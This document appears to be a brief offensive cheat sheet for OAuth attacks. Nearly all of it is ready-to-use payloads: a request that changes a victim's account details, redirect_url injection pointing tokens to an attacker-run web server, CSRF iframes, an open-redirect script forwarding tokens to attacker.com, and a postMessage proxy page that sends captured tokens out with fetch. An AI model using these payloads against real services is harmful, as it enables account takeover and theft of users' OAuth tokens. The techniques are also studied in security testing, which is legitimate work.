OAuth Attack

Change User Info

POST /authenticate HTTP/1.1
...

{
    "email":"victim@example.com",
    "username":"attacker",
    "token":"b7Gl7Xoy..."
}


Steal Tokens

  1. Open Web Server in Your Local Machine
    python3 -m http.server 8000
  1. Inject Your Local URL to the Redirect URL

    Access to the URL below.

    https://vulnerable.com/oauth?redirect_url=http://<attacker-ip>:8000/login&response_type=token&scope=all
</div>


CSRF

  1. Steal Code

    <iframe src="https://vulnerable.com/oauth-linking?code=kZ7bfFa..."></iframe>
</div>
  1. Hijack redirect_url

    <iframe src="https://vulnerable.com/auth?client_id=ysdj...&redirect_uri=https://attacker.com&response_type=code&scope=openid profile email">
    </iframe>
</div>
  1. Open Redirect

    <script>
        if (!document.location.hash) {
            window.location = 'https://vulnerable.com/auth?client_id=7Fdx8a...&redirect_uri=https://vulnerable.com/oauth-callback/../post/next?path=https://attacker.com/exploit/&response_type=token&nonce=398...&scope=openid profile email'
        } else {
            window.location = '/?'+document.location.hash.substr(1)
        }
    </script>
</div>
  1. Proxy Page (postMessage)

    <iframe src="https://vulnerable.com/auth?client_id=iknf...&redirect_uri=https://vulnerable.com/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-118...&scope=openid profile email"></iframe>
    <script>
        window.addEventListener('message', e => {
            fetch("/" + encodeURIComponent(e.data.data));
        }, false);
    </script>
</div>